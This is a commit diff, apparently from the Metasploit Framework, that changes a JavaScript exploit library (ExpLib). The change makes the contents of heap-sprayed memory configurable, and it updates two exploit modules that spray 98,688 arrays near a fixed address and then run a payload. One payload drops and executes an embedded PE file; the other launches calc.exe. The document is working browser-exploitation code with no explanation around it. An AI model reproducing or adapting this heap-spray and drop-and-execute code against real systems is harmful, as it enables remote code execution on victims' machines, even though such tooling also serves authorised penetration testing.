Allow easier control of sprayed memory
parent
0523d9e625
commit
ce02f8a7c5
|
@ -8,6 +8,10 @@ ExpLib = (function() {
|
|||
this.base = base;
|
||||
this.arr_size = arr_size;
|
||||
this.arr_arr = null;
|
||||
// Allows to control the contents of the sprayed memory.
|
||||
// Have into account some array positions will be corrupted
|
||||
// while leaking and modifying things.
|
||||
this.arr_contents = [];
|
||||
|
||||
this.payload = payload;
|
||||
this.modules = {}
|
||||
|
@ -35,7 +39,6 @@ ExpLib = (function() {
|
|||
return module;
|
||||
}
|
||||
|
||||
|
||||
ExpLib.prototype.spray = function() {
|
||||
this.arr_arr = new Array( num_arrays );
|
||||
|
||||
|
@ -50,14 +53,20 @@ ExpLib = (function() {
|
|||
|
||||
for ( var i = 0; i < num_arrays; ++ i ) {
|
||||
this.arr_arr[i] = eval(decl);
|
||||
this.arr_arr[i][0] = 0x21212121;
|
||||
this.arr_arr[i][1] = 0x22222222;
|
||||
this.arr_arr[i][2] = 0x23232323;
|
||||
this.arr_arr[i][3] = 0x24242424;
|
||||
for(var j = 0; j < this.arr_contents.length; j++) {
|
||||
this.arr_arr[i][j] = this.arr_contents[j];
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
// Should be used before calling spray()
|
||||
ExpLib.prototype.setArrContents = function(contents) {
|
||||
for(var i = 0; i < this.arr_size && i < contents.length; i++) {
|
||||
this.arr_contents[i] = contents[i];
|
||||
}
|
||||
}
|
||||
|
||||
ExpLib.prototype.setValue = function(i1, i2, v) {
|
||||
this.arr_arr[i1][i2] = v;
|
||||
}
|
||||
|
|
|
@ -63,7 +63,7 @@ var pe_exe = "<%= exe_js %>"
|
|||
var num_arrays = 98688;
|
||||
var arr_size = (0x1000 - 0x20)/4;
|
||||
var explib = new ExpLib( num_arrays, arr_size, 0x1a1b3000, new payload_drop_exec(pe_exe) );
|
||||
|
||||
explib.setArrContents([0x21212121, 0x22222222, 0x23232323, 0x24242424]);
|
||||
explib.spray();
|
||||
|
||||
/*
|
||||
|
|
|
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
var num_arrays = 98688;
|
||||
var arr_size = (0x1000 - 0x20)/4;
|
||||
var explib = new ExpLib( num_arrays, arr_size, 0x1a1b3000, new payload_exec('calc.exe') );
|
||||
|
||||
explib.setArrContents([0x21212121, 0x22222222, 0x23232323, 0x24242424]);
|
||||
explib.spray();
|
||||
|
||||
/*
|
||||
|
|
Loading…
Reference in New Issue